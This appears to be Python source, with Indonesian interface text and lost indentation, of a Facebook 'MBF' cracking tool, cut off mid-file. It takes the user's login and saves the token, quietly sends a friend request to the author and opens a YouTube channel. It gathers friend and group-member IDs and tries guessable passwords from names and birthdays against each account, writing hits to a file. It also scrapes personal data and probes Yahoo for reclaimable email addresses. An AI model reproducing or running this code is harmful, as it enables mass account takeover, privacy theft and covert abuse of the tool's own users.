●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="Krisna" and password =="Habib":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
